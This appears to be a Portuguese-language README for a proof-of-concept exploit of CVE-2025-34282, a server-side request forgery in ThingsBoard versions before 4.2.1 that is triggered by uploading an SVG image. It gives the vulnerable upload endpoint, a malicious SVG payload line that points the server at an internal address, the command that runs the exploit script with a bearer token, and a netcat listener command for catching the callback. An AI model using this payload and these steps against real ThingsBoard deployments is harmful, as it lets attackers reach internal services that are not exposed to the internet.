
Exploit PoC para CVE-2025-34282 - SSRF no ThingsBoard via Upload de Imagem SVG
Vulnerabilidade de Server-Side Request Forgery (SSRF) na plataforma ThingsBoard IoT em versões anteriores a 4.2.1.
Um atacante com acesso de Administrador de Locatário pode fazer upload de um arquivo SVG malicioso contendo uma referência de URL interna via Galeria de Upload de Imagem. Quando o ThingsBoard processa o SVG no lado do servidor, ele busca a URL referenciada — permitindo acesso a serviços internos não expostos à internet.
| Campo | Detalhes |
|---|
| CVE | CVE-2025-34282 |
| Versão Afetada | < 4.2.1 |
| Versão Corrigida | 4.2.1 |
| Pontuação CVSS | 6.9 Média |
| CWE | CWE-918 (Server-Side Request Forgery) |
| Fornecedor | https://thingsboard.io |
POST /api/image
publicLink do SVG através de uma tag <object>
O payload ssrf_localhost_5555.svg embute uma referência de URL interna:
<image xlink:href="http://127.0.0.1:5555" x="0" y="0" width="600" height="450" />
Quando enviado, o servidor do ThingsBoard busca http://127.0.0.1:5555, confirmando a SSRF.
Requisitos:
pip install requests
Executar:
python thingsboard_4.2.0_ssrf_CVE-2025-34282_exploit.py <svg_file> <bearer_token>
Exemplo:
python thingsboard_4.2.0_ssrf_CVE-2025-34282_exploit.py ssrf_localhost_5555.svg eyJhbGci...
Inicie um listener para capturar o callback da SSRF antes de executar o exploit:
nc -l 5555
Tamil Mathi T.